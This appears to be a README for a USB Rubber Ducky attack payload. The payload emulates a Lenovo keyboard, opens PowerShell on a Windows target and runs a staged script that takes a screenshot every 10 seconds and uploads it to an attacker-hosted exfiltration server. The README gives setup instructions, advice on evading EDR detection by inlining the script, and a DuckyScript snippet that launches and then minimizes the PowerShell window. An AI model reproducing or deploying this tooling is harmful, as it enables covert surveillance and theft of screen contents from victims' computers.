2.7 KiB
2.7 KiB
Windows Screenshot Exfiltration Payload
Overview
This payload captures screenshots from a Windows machine every 10 seconds and uploads them to a specified server using the Powershell. The payload is designed to run until the window is closed or the loop is broken out.
Features
- Target OS: Windows 10, 11
- Exfiltration Method: Screenshots are taken and uploaded to a server every 10 seconds.
- Detection and Execution: Automatically detects if the target OS is Windows and executes the payload accordingly.
- HID Emulation: Emulates a Lenovo keyboard with a random serial number.
- Fallback: If the OS is not Windows, the USB Rubber Ducky will function as a storage device.
Files
payload.txt
: The main script that is deployed to the USB Rubber Ducky.script.ps1
: The Staged PowerShell script that takes screenshots and uploads them to the server.
Setup Instructions
- Server Setup: Set up a server to receive the uploaded screenshots and host the script.ps1 file. I used IngoKl/HTTPUploadExfil as it is pretty easy to set up.
- Update URLS: Modify
script.ps1
to include your server URL where the screenshots will be uploaded and modifypayload.txt
to reference the URL of the hostedscript.ps1
$url
inscript.ps1
#MY_STAGED_SCRIPT
inpayload.txt
- Upload Files:
- Inject
payload.txt
on the USB Rubber Ducky. - Host
script.ps1
on a web server.
- Inject
Note: In the provided files, the exanple URLs are followed by /l
in the payload and by /p
for the sending of screenshots, this is because I use HTTPUploadExfil, modify this is you do not use the same exfil server as I do.
Usage
Payload Execution
- Insert USB Rubber Ducky: Plug the USB Rubber Ducky into the target machine.
- OS Detection: The payload automatically detects if the target OS is Windows.
- Payload Deployment:
- If Windows is detected, it emulates a Lenovo keyboard, opens PowerShell, and runs the PowerShell script.
- If the target OS is not Windows, it switches to storage mode (Usefull for dev purposes).
PowerShell Script Execution
The PowerShell script (script.ps1
) runs the following commands:
- Takes a screenshot every 10 seconds.
- Uploads the screenshot to the specified server.
- Repeats until the PowerShell window is closed.
Alternative
Some EDR detect the download of a powershell script from internet, this clould led to the payload beeing blocked. As an alternative, you could take the content of script.ps1
and put in directly in the payload.
GUI r
DELAY 500
STRINGLN powershell
DELAY 500
STRINGLN
[... The content of script.ps1 here ...]
END_STRINGLN
ENTER
DELAY 500
ALT SPACE
STRING n